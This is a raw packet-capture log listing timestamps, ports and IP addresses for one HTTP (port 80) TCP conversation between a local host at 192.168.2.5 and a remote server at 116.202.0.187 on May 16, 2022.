May 16, 2022 10:29:37.969578028 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969587088 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969594002 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969611883 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969626904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969643116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969649076 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969659090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969676018 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969691992 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969701052 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969707966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969726086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969742060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969752073 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969758034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969774961 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969790936 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969803095 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969806910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969825029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969841003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969847918 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969858885 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969875097 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969885111 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969891071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969908953 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969924927 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969933033 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969940901 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969959021 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969971895 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.969974995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.969991922 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970006943 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970020056 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.970021963 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970041037 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970057011 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970069885 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.970072985 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970091105 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970105886 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970119953 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.970122099 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970138073 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970154047 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970165968 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.970170021 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970185995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970201969 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970212936 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.970218897 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.970259905 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.970293999 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.985516071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.985546112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.985563993 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.985682964 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.985730886 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986048937 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986103058 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986115932 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986135006 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986150980 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986160040 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986166954 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986182928 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986195087 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986198902 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986217022 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986232042 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986248016 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986255884 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986264944 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986283064 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986289978 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986299992 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986315966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986330032 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986332893 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986350060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986365080 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986366034 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986382008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986397982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986401081 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986413956 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986429930 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986443043 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986444950 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986464024 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986479998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986483097 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986495972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986512899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986519098 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986530066 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986545086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986553907 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986561060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986577034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986593008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986596107 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986609936 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986625910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986634970 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986641884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986658096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986673117 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986680031 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986690044 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986706018 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986721992 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986726999 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986740112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986754894 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986763954 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986771107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986787081 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986803055 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986816883 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986818075 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986835003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986850977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986860037 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986866951 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.986891031 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.986923933 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.987442970 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.987466097 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.987482071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.987512112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.987514019 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.987552881 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.987601042 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.988822937 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988848925 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988864899 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988877058 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988893032 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988909006 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988922119 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.988924980 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988941908 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988961935 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988976955 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.988979101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.988996983 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989012957 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989013910 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989029884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989044905 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989051104 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989063025 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989078999 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989087105 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989094973 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989111900 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989125967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989132881 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989142895 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989159107 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989173889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989188910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989198923 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989204884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989221096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989223003 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989238977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989253998 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989264011 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989269972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989286900 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989301920 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989305973 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989317894 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989332914 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989339113 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989348888 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989365101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989372969 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989379883 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989396095 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989411116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989419937 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989424944 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989442110 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989456892 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989465952 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989473104 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989489079 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989496946 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989505053 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989521980 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.989567995 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.989602089 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.990822077 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990850925 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990865946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990883112 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990890026 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.990899086 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990921974 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990937948 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.990942955 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990962982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990978003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990993977 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.990994930 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991009951 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991028070 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991044044 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991058111 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991059065 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991075993 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991091967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991102934 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991108894 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991126060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991141081 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991142035 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991158009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991173983 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991180897 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991190910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991208076 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991224051 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991239071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991246939 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991255045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991271019 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991286039 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991301060 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991313934 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991317034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991333008 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991348982 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991360903 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991364956 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991381884 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991396904 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991411924 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991422892 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991427898 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991445065 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991460085 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991476059 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991487980 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991491079 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991508007 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991523027 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991538048 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991553068 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991563082 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991569042 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991585970 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991601944 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991616964 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991626978 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991632938 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991650105 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991663933 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991677046 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991679907 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991697073 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991712093 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991728067 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991734982 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991750002 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991765976 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991781950 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991786003 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991799116 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991815090 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991831064 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991836071 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991847992 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991863012 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991879940 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991885900 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991897106 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991914034 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991929054 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991939068 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991945028 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991962910 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991977930 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.991991043 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.991995096 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992011070 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992028952 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992043972 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992059946 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992067099 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.992075920 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992091894 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992106915 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992122889 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992127895 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.992139101 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992156029 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992172003 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992177963 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.992188931 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992206097 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992222071 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992235899 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.992238045 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992254019 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992269039 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992285967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992292881 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.992305040 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992320061 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992336035 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992352009 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992356062 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.992368937 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992384911 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:37.992413044 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:37.992461920 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.005733967 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.005789995 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.005805969 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.005951881 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007260084 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007287979 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007303953 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007320881 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007335901 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007352114 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007368088 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007380962 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007384062 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007402897 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007412910 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007419109 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007435083 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007455111 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007457972 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007472038 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007488966 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007504940 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007519960 CEST	80	49756	116.202.0.187	192.168.2.5
May 16, 2022 10:29:38.007525921 CEST	49756	80	192.168.2.5	116.202.0.187
May 16, 2022 10:29:38.007536888 CEST	80	49756	116.202.0.187	192.168.2.5
